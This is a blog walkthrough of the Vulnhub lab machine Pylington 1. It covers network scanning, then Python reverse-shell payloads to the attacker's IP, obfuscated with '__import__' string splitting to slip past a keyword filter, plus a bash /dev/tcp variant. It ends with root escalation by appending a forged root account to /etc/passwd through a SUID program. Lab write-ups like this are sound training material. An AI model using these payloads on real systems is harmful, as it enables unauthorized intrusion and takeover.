NepCodeX

Byte Musings: Where Tech Meets Curiosity


Pylington 1 Walkthrough – Vulnhub – Writeup

server e1622927173550

I am going to do the walkthrough of fun machine from vulnhub in this post. The machine is pylington by Peter Ye.

Link to Pylington 1: https://www.vulnhub.com/entry/pylington-1,684/

writeup

Identify target

The first thing is to identify the target to play with.

fping -aqg 10.0.2.0/24
image 191

Scan open ports

The next thing is to scan open ports where we have to search for vulnerabilities.

nmap -T4 -p- -sC -sV --min-rate=1000 10.0.2.20
image 192

We found an unusual path in our http server.

Extract information from HTTP server

image 193

It looks like I found a username and password to login to the server.

image 194

It looks like we can execute python commands through the website, however, there is a restriction in writing some code.

image 195

I will try to execute a reverse shell using python without using import, os and open. So, I will listen to a port using netcat in my local machine.

nc -nlvp 4444

Now, the python code to get the shell would be the following.

import os,pty,socket;s=socket.socket();s.connect(("10.0.2.15",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")

However, we cannot use import and os commands. Now, we have to find a way to use those syntaxes as strings. Luckily, python allows that. We can use exec command in python which evaluates a string. So, I have to modify the code accordingly.

i="imp"+"ort";o="o"+"s";exec(f'bs=__{i}__("{o}");pty=__{i}__("pty");socket=__{i}__("socket");s=socket.socket();s.connect(("10.0.2.15",4444));[bs.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")')

In the above lines of code, I tried to avoid the keywords, import and os. Hence, I used the sugar function for the import command, __import__. For example, import math is the same as math = __import__(‘math’). Hence, I split the word import to imp and ort and concatenated them and stored as a variable i. Likewise, I did the same for the command module os. Moreover, I renamed the module os to another variable called bs since the word os is restricted. Now, let’s run the code.

image 196

Finally, I got the shell from the user http. Next, I found a home directory of user py.

image 197

In the home directory of user py, I found a suid binary which would allow us to execute the binary as the user py.

image 198

With a simple game, I found the password and tried the same to log in using SSH because that looks good.

image 200

Root privilege escalation

We had an another suid program inside secret_stuff directory named backup. So, I tried running the program to see what it does.

image 201

It seems as if it can append a line to the end of a file. Hence, we can exploit this loophole to add a new user in our /etc/passwd. For that, we have to use openssl to create a hash of the password.

openssl passwd -1 -salt N3PC0D3X.C0M nepcodex.com
image 202

So, I generated an MD5 hash with a salt. Now, I can craft a line to add to /etc/passwd file as follows.

nepcodex:$1$N3PC0D3X$26serhpqJW9UQGuodci2L/:0:0::/root:/bin/bash

For the file I could use directory traversal of unix systems. .. means the previous directory where as . means the current directory.

image 203

I got the root access and now I can get the flag as well.

cd /root
cat root.txt
image 204

Conclusion

I loved this machine and it’s quite fun to do. Also, a point to note here is that I wrote a long command to get the reverse shell. Its alternative could have been os.system("bash -i >& /dev/tcp/10.0.2.15/4444 0>&1"). It’s totally valid but it may not always work. For example, it didn’t work in my system. However, you guys can replace the code with the following command to see if it works or not.

i="imp"+"ort";o="o"+"s";exec(f'__{i}__("{o}").system("/bin/bash -i >& /dev/tcp/10.0.2.15/4444 0>&1")')



0 0 votes
Article Rating
Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments